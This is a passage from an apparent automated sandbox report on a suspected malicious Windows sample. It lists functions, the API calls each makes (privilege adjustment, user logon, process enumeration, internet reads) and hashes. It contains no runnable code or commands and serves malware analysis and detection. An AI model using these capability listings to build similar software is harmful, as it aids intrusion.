                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DdB$DdB$DdB$DdB$Variable must be of type 'Object'.
                                                            • API String ID: 0-4073077587
                                                            • Opcode ID: 7027eb90014bfc44cc27a51be1f1ccd0fe0d936f7abc8ccd3ff844badd4f3329
                                                            • Instruction ID: 324cfab5ffee2a3f24db67aa02fc8c37d1779d7524ce526840952430082b1250
                                                            • Opcode Fuzzy Hash: 7027eb90014bfc44cc27a51be1f1ccd0fe0d936f7abc8ccd3ff844badd4f3329
                                                            • Instruction Fuzzy Hash: 3CA2C178A00215CFCB26CF98C480AAEB7B5FF59310F65C069E805AB359D775ED4ACB90
                                                            Function 00364B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00364AD0), ref: 00364B45
                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00364B57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 2574300362-192647395
                                                            • Opcode ID: 2214c2da4dec49ee4ac0009f4b89033732fa81b17f09035e155d5c29f4f0b9a9
                                                            • Instruction ID: 690784e3201b56e1d8f5fc11a7d29827e168ee9fc23a4fcac2b2af2602a963a6
                                                            • Opcode Fuzzy Hash: 2214c2da4dec49ee4ac0009f4b89033732fa81b17f09035e155d5c29f4f0b9a9
                                                            • Instruction Fuzzy Hash: 0CD01234E10767CFDB229F32D858B4676D8AF45351F11C93DD4C6DA190D6B0D480C654
                                                            Function 003DEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 003DEE3D
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 003DEE4B
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 003DEF0B
                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 003DEF1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                            • String ID:
                                                            • API String ID: 2576544623-0
                                                            • Opcode ID: f8ec537205f1b09776748829f8385345db73843792a114918df75834896cbf5f
                                                            • Instruction ID: 1110e38078146f551e7dd7c6d5b85c7e31b673d92016d8ab95c851c1d41bdb9d
                                                            • Opcode Fuzzy Hash: f8ec537205f1b09776748829f8385345db73843792a114918df75834896cbf5f
                                                            • Instruction Fuzzy Hash: 435171725043119FD322EF24DC81E6BBBE8EF94750F50892DF5959B2A1DB70A904CB92
                                                            Function 003BE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003BE628
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: ($|
                                                            • API String ID: 1659193697-1631851259
                                                            • Opcode ID: cb5a36b76afdb26b52abeb65d39e015ea806475f284262b4fcb0203a4c19d0a2
                                                            • Instruction ID: ddeb71de55b567756b80559fecca5180ae7c1a16f6756a7d1276b82c98d416dd
                                                            • Opcode Fuzzy Hash: cb5a36b76afdb26b52abeb65d39e015ea806475f284262b4fcb0203a4c19d0a2
                                                            • Instruction Fuzzy Hash: C6324675A007059FD729CF19C481AAAB7F0FF48314B12C56EE99ADB7A1EB70E941CB40
                                                            Function 003D22EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003D180A,00000000), ref: 003D23E1
                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 003D2418
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                            • String ID:
                                                            • API String ID: 599397726-0
                                                            • Opcode ID: a663d6027011f42f1a578301dcbf57010165015cf15a466dd1972cd615361429
                                                            • Instruction ID: 35df0148ad072df9f91b482bbe9a68da421672256eabe901960767c8332e9e48
                                                            • Opcode Fuzzy Hash: a663d6027011f42f1a578301dcbf57010165015cf15a466dd1972cd615361429
                                                            • Instruction Fuzzy Hash: 7341F776904309BFEB22DE96EC81EBB77BCEB50314F10406BFA01A6740DA759E419650
                                                            Function 003CB333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 003CB343
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003CB39D
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 003CB3EA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID:
                                                            • API String ID: 1682464887-0
                                                            • Opcode ID: d4b7c6f56c3e75af211058d738ca86988f3eb6f45e0a45852470c9896986754e
                                                            • Instruction ID: d86032159247edca225688d0f8bb485f5316250ba191b69ad1f3c75757916066
                                                            • Opcode Fuzzy Hash: d4b7c6f56c3e75af211058d738ca86988f3eb6f45e0a45852470c9896986754e
                                                            • Instruction Fuzzy Hash: 5D215C75A00508EFCB01EFA5D881EEDBBB8FF49314F1481AAE905EB355CB31A915CB51
                                                            Function 003B87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00380DB6: std::exception::exception.LIBCMT ref: 00380DEC
                                                              • Part of subcall function 00380DB6: __CxxThrowException@8.LIBCMT ref: 00380E01
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003B882B
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003B8858
                                                            • GetLastError.KERNEL32 ref: 003B8865
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1922334811-0
                                                            • Opcode ID: 9e28169e6aecbad3917544a60dd003f17d6e32d43ea8959acfaa3444a8869d78
                                                            • Instruction ID: aa242cb84a11beee5b9da12d53a59a0890bd94cfdc77ddc9cbf908fc5450c5ee
                                                            • Opcode Fuzzy Hash: 9e28169e6aecbad3917544a60dd003f17d6e32d43ea8959acfaa3444a8869d78
                                                            • Instruction Fuzzy Hash: 70119DB2414304AFE729EFA4DC85D6BB7ADFB44314B20852EF45587651EA70BC04CB60
                                                            Function 003B874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003B8774
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003B878B
                                                            • FreeSid.ADVAPI32(?), ref: 003B879B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 6fb0085660597593d6cc54980098a3eb455b1decca8d21d9dbecc21f76d33a66
                                                            • Instruction ID: 43e82a9e57bd10509ad5eb88169c3c80034b4643170712c07251b09a700baa2a
                                                            • Opcode Fuzzy Hash: 6fb0085660597593d6cc54980098a3eb455b1decca8d21d9dbecc21f76d33a66
                                                            • Instruction Fuzzy Hash: CAF04975A1130CBFDF10DFF4DC89ABEBBBCEF08311F1045A9AA01E6581E6716A048B50
                                                            Function 003C8889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __time64.LIBCMT ref: 003C889B
                                                              • Part of subcall function 0038520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,003C8F6E,00000000,?,?,?,?,003C911F,00000000,?), ref: 00385213
                                                              • Part of subcall function 0038520A: __aulldiv.LIBCMT ref: 00385233
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                            • String ID: 0eB
                                                            • API String ID: 2893107130-1534231516
                                                            • Opcode ID: 4bcfaa03c87d9f14309691819c12892384edc3a2f11ca1f504f40666854174ba
                                                            • Instruction ID: 4c0d334efea22ed266afc9c90f27bbaa2a661a5d41be218dc8cfca723f0b0471
                                                            • Opcode Fuzzy Hash: 4bcfaa03c87d9f14309691819c12892384edc3a2f11ca1f504f40666854174ba
                                                            • Instruction Fuzzy Hash: 7C21A2326256108BC729CF29D841B52B3E1EFA5311BA98E6CD0F5CB2C0CA74AD45CB54
                                                            Function 003CC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 003CC6FB
                                                            • FindClose.KERNEL32(00000000), ref: 003CC72B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: f852ac380d2bfc4b9ce01337c29451fae6412b27b5048ef2eeffd281f48710ce
                                                            • Instruction ID: e215cead3bd065fbeff468ef97beb8ba34ad8b0851e6bebd4cce988423287fd1
                                                            • Opcode Fuzzy Hash: f852ac380d2bfc4b9ce01337c29451fae6412b27b5048ef2eeffd281f48710ce
                                                            • Instruction Fuzzy Hash: 6D1182756002009FDB11DF29C885A2AF7E8EF45324F00C51EF9A9CB291DB70AC05CB81
                                                            Function 003CA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,003D9468,?,003EFB84,?), ref: 003CA097
                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,003D9468,?,003EFB84,?), ref: 003CA0A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: ecdc7a938d0fab39ae0fa67aebdc5878cd473e4eb0e1d40cf9a0db8ac3b5336e
                                                            • Instruction ID: e9a39894c74f4f97762ad0a8630637fdbee9bff6b6a32aa8c6f5100b65ea71bc
                                                            • Opcode Fuzzy Hash: ecdc7a938d0fab39ae0fa67aebdc5878cd473e4eb0e1d40cf9a0db8ac3b5336e
                                                            • Instruction Fuzzy Hash: 0AF0823510522DABDB229FA4CC88FEA776CFF08361F008269F909DA181D7709D44CBA1
                                                            Function 003B81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003B8309), ref: 003B81E0
                                                            • CloseHandle.KERNEL32(?,?,003B8309), ref: 003B81F2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                            • String ID:
                                                            • API String ID: 81990902-0
                                                            • Opcode ID: ffdc784d408301466d005f9b05915b9f7f7d821b103906d10ed65f3fccdfd6c7
                                                            • Instruction ID: d2f7ec27bc2ffa5e26c1be9fe06fc5de097a51c7feded5c05e2df67ac8001b00
                                                            • Opcode Fuzzy Hash: ffdc784d408301466d005f9b05915b9f7f7d821b103906d10ed65f3fccdfd6c7
                                                            • Instruction Fuzzy Hash: 36E0E671011610AFE7672B74EC05D7777EDEF04315B14896DF55588470DB616C91DB10
                                                            Function 0038A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00388D57,?,?,?,00000001), ref: 0038A15A
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0038A163
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 8723645a10973f231d96ef33a92cbcdda9447381201735653944b5600148869a
                                                            • Instruction ID: 9fc0a2891c899cf2d6d1949a25d3538415185ed22bc6b4ace57dc8f43b9fc39c
                                                            • Opcode Fuzzy Hash: 8723645a10973f231d96ef33a92cbcdda9447381201735653944b5600148869a
                                                            • Instruction Fuzzy Hash: 1BB09235054248AFCA122B91EC49B883F6CEB44BA2F404120F60D886A4CBA255508A91
                                                            Function 0038F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2199619d16f740ab76fb638b3abcf49d51b0caa7720228d85a1b1a6fa612c310
                                                            • Instruction ID: 94cea69ebca3a010be17762b1c97f01544c36b5a603f033e90a408803e654f7f
                                                            • Opcode Fuzzy Hash: 2199619d16f740ab76fb638b3abcf49d51b0caa7720228d85a1b1a6fa612c310
                                                            • Instruction Fuzzy Hash: 1D32F521D29F414DD723A634D832336A64DAFB73D4F15D777F81AB5AA5EB29C8838200
                                                            Function 0039242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: decd6550ab92198d31e0cbbcb3af51534fdacd6af618eec7309e553489792ad1
                                                            • Instruction ID: ca469b3330785ddba35e45bb9ffc5ad33f3aa83c9f95127ef46de4e3ccd8f1c9
                                                            • Opcode Fuzzy Hash: decd6550ab92198d31e0cbbcb3af51534fdacd6af618eec7309e553489792ad1
                                                            • Instruction Fuzzy Hash: BDB10260D2AF414DD72396398871336BB5CAFBB2C5F52D71BFC2A74E22EB2185838141
                                                            Function 003C4C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003C4C4A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: mouse_event
                                                            • String ID:
                                                            • API String ID: 2434400541-0
                                                            • Opcode ID: e0ea61ca6fde625e67a3e8a7ec91b9c5fd0c1c7c06a263481fa13fa00471ec24
                                                            • Instruction ID: 0869fbb83f2e72c7301d3662373f34a0accd2865aaffd6d7fb0f6bf38823d6e8
                                                            • Opcode Fuzzy Hash: e0ea61ca6fde625e67a3e8a7ec91b9c5fd0c1c7c06a263481fa13fa00471ec24
                                                            • Instruction Fuzzy Hash: F6D05E9116520938ED2E0720AE7FFBA010CE300782FD1E24D7102CA0E1ECC09C405330
                                                            Function 003B87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,003B8389), ref: 003B87D1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: LogonUser
                                                            • String ID:
                                                            • API String ID: 1244722697-0
                                                            • Opcode ID: 03347e4bede9531efaf88cc6c81895b00b487ef9b566c0ed51be88aa4e7d57fe
                                                            • Instruction ID: 541b6b2f24b8e14358d83f7396721b263442b47654fd56005efedeff33904bad
                                                            • Opcode Fuzzy Hash: 03347e4bede9531efaf88cc6c81895b00b487ef9b566c0ed51be88aa4e7d57fe
                                                            • Instruction Fuzzy Hash: 2ED05E3226050EAFEF118EA4DC01EBE3B69EB04B01F408111FE15C50A1C7B5D835AB60
                                                            Function 0038A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0038A12A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
